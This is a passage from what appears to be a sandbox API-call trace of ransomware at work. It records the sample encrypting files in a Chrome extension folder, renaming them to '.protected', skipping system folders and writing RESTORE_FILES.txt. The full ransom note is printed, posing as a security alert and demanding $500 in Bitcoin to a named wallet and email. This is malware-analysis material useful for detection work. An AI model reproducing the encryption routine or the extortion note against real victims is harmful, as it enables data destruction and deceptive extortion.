(lpString1="mirroring_hangouts.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.319] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.319] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.320] StrStrW (lpFirst="mirroring_hangouts.js", lpSrch=".txt") returned 0x0 [0083.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.320] StrStrW (lpFirst="mirroring_hangouts.js", lpSrch=".rar") returned 0x0 [0083.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.320] StrStrW (lpFirst="mirroring_hangouts.js", lpSrch=".zip") returned 0x0 [0083.320] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.322] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.322] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.322] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.322] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.334] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.334] CloseHandle (hObject=0x160) returned 1 [0083.334] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.protected") returned 170 [0083.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.protected")) returned 1 [0083.335] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="Windows") returned -1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="Program Files") returned -1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="Program Files (x86)") returned -1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="$Recycle.bin") returned 1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="System Volume Information") returned -1 [0083.336] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrIW (lpFirst="mirroring_webrtc.js", lpSrch=".protected") returned 0x0 [0083.336] lstrcmpW (lpString1="mirroring_webrtc.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.336] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.336] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrW (lpFirst="mirroring_webrtc.js", lpSrch=".txt") returned 0x0 [0083.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrW (lpFirst="mirroring_webrtc.js", lpSrch=".rar") returned 0x0 [0083.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrW (lpFirst="mirroring_webrtc.js", lpSrch=".zip") returned 0x0 [0083.336] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x941, lpOverlapped=0x0) returned 1 [0083.346] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff6bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.346] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x941, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x941, lpOverlapped=0x0) returned 1 [0083.347] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.347] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.347] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.347] CloseHandle (hObject=0x160) returned 1 [0083.347] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.protected") returned 168 [0083.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.protected")) returned 1 [0083.348] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0083.348] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales") returned 147 [0083.348] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0083.348] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0083.348] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*") returned 149 [0083.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0083.350] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.350] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.350] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.350] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.350] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.350] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\.") returned 149 [0083.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.350] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.351] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.351] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.351] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.351] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.351] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.351] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\..") returned 150 [0083.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.351] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.351] lstrcmpiW (lpString1="am", lpString2="Windows") returned -1 [0083.351] lstrcmpiW (lpString1="am", lpString2="Program Files") returned -1 [0083.351] lstrcmpiW (lpString1="am", lpString2="Program Files (x86)") returned -1 [0083.351] lstrcmpiW (lpString1="am", lpString2="$Recycle.bin") returned 1 [0083.351] lstrcmpiW (lpString1="am", lpString2="System Volume Information") returned -1 [0083.351] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned 150 [0083.351] lstrcmpW (lpString1="am", lpString2=".") returned 1 [0083.351] lstrcmpW (lpString1="am", lpString2="..") returned 1 [0083.351] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*") returned 152 [0083.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.351] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.351] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.351] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.351] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\.") returned 152 [0083.352] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.352] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.352] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.352] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.352] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.352] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.352] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\..") returned 153 [0083.352] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.352] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.352] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.352] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.352] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.352] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.353] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.353] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.354] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.354] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.354] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.356] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.356] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.356] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.356] CloseHandle (hObject=0x168) returned 1 [0083.357] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.protected") returned 174 [0083.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.protected")) returned 1 [0083.357] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.357] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.358] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\RESTORE_FILES.txt") returned 168 [0083.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.358] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.359] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.359] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.359] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 